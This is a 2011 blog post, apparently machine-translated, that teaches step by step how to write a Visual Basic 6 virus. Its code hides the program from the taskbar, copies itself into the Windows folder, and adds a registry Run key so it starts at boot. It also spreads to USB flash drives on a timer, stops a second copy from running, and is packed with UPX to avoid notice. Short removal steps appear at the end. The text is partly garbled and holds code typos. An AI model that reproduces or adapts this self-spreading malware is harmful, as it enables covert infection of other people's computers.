1.hiding it self when running
Create a new project, and add a sub main (Project Add-Module)
Option explicit? Each variable must be declared
Sub main ()
App.TaskVisible = False does not appear in the taskbar
Form1.Visible = False does not display the form
End Sub
Make a sub main as your startup object program (Project-Project Properties-Startup Object, Sub Main)
Try Runing the program, is your program visible (the form and the taskbar)?
2.Enabling it self every System boot process.
Add a new sub with the name virusInstall
Sub VirusInstall()
Dim wShell As Object
Dim fSource As String
Dim fTarget As String
'take the path and name of the exe file
fSource = App.Path & "\" & App.EXEName & ".exe"
'duplicate to the windows folder
fTarget = Environ$("windir") & "\MyVirus.exe"
'Check if already been installed
If Dir(fTarget) = "" Then
Call FileCopy(fSource, fTarget)
Set wShell = CreateObject("WScript.Shell")
'run registry manipulation
wShell.regwrite "HKLM\Software\micr*soft\Windows\Run\MyVirus", fTarget
End If
End Sub
and enable the sub virusInstall from Sub Main
Sub Main()
App.TaskVisible = False
Form1.Visible = False
Call VirusInstall ?install diri
End Sub
3.Through self-distribution of flash disk
?Add a global variable (in the general declaration section) to 1 on the flash disk only 1 time of infection (the virus that must be good, of course, in the efficient use of resources so that attendance can not be known quickly)
Dim infectedFlashDisk As Boolean ?flags have been infected or not
?Add the following sub for replication themselves to the virus
Public Sub replikasiDiri(targetDrive As String)
Dim fSource As String
Dim fTarget As String
'replication of the C: \ Windows (the location of the installation itself)
fSource = Environ$("windir") & "\MyVirus.exe"
'targets to the drive
fTarget = targetDrive + "\MyVirus.exe"
'do not replicate more than 1 times on the same media
If Dir(fTarget) = "" Then
Call FileCopy(fSource, fTarget)
End If
End Sub
? Add the following sub to monitor the existence of the flash
Public Sub sebarFlashDisk()
On Error GoTo BatalInfeksi
Dim AdaFlashDisk As Boolean
Dim ObjFSO As Object
Dim ObjDrive As Object
? create a file scripting object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
AdaFlashDisk = False
For Each ObjDrive In ObjFSO.Drives
'The assumption of all removable drive letters above C is a flash disk
'1 - Removable drive
'2 - Fixed drive (hard disk)
'3 - Mapped network drive
'4 - CD-ROM drive
'5 - RAM disk
If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C" Then
AdaFlashDisk = True
'should not be repeated infection and the remaining capacity of> 100 kb
If Not infectedFlashDisk And ObjDrive.AvailableSpace > 102400 Then
Call replikasiDiri(ObjDrive.DriveLetter+? )
infectedFlashDisk = True?enable flag is infection
End If
End If
Next
If Not AdaFlashDisk Then?no flash disk
infectedFlashDisk = False ?reset flag has been infected
End If
CancelInfection:
End Sub
? Add timer control on the form1
Private Sub Timer1_Timer()
Call sebarFlashDisk ? enable the distribution flasdisk
End Sub
? Setting flag is set and the infection control timer through the main sub
Sub Main()
App.TaskVisible = False
Form1.Visible = False
Call VirusInstall
'Set the global variable
infectedFlashDisk = False
'Set the time setting
Form1.Timer1.Interval = 5000
Form1.Timer1.Enabled = True
End Sub
4. Restrict themselves to only 1 times
Virus that must be efficient, of course, sparing resources and use of efficient algorithms, so that his presence is not felt by the user.
? Add findWindow function from WINAPI
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
? Add the function is active
Function active(Title As String) As Boolean
Dim vir_hwnd As Long
'If the virus is active window
'Search window with the same title
vir_hwnd = FindWindow(vbNullString, Title)
active = Not (vir_hwnd = 0)
End Function
? Modify sub Main
Sub Main()
Dim virusname As String
virusname = "MyVirus"
If Not active(nvirusname) Then? if not active yet
Form1.Visible = False
Call VirusInstall
'Set the global variable
infectedFlashDisk = False
'Set the time setting
Form1.Caption = virusname? Window title mark
Form1.Timer1.Interval = 5000
Form1.Timer1.Enabled = True
End If
End Sub
6. Change Icon MyVirus
7. Reduce the size of your executable virus
Results from compiling the program MyVirus size is 24,576 bytes, and of course, quite small for the size of VB virus, but would that be if the virus executable is smaller again, so the process of loading speed.
For the executable file can use software such as the Ultimate Packer for executable.
Upx Project.exe
And after the file size is 8704-bytes UPX.
8. Removing this virus
a. In the Run-Registry, go to HKLM \ Software \ micr * soft \ Windows \ Run and delete the value? MyVirus?
b. Delete the file C: \ Windows \ MyVirus.exe
Very Easy to enable the virus to stop that is made with VB, just rename msvb60 in the directory C: \ Windows \ winNT \ system32
enjoy it
Wednesday, June 15, 2011
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment